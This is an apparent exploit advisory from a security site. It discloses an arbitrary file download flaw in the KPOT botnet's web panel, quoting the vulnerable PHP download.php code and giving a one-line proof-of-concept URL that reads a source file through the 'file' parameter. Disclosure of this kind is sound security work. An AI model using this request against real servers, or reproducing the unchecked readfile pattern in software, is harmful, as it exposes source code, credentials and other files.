KPOT Botnet - File Download/Source Code Disclosure Vulnerability

2018.12.01
co n4pst3r (CO) co
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################ # Exploit Title: KPOT Botnet - File Download/Source Code Disclosure Vulnerability # Google Dork: n/a # Date: 26/11/2018 # Exploit Author: n4pst3r # Vendor Homepage: unkn0wn # Software Link: https://bhf.io/threads/515432/ # Version: unkn0wn # Tested on: Windows 10, debian 7 # CVE : n/a ################################ # Vuln-Code: download.php <?php if (isset($_GET['file'])) { $file = $_GET['file']; header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Content-Length: ' . filesize($file)); readfile($file); } ?> ################################ PoC: http://127.0.0.1/download.php?file=global.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top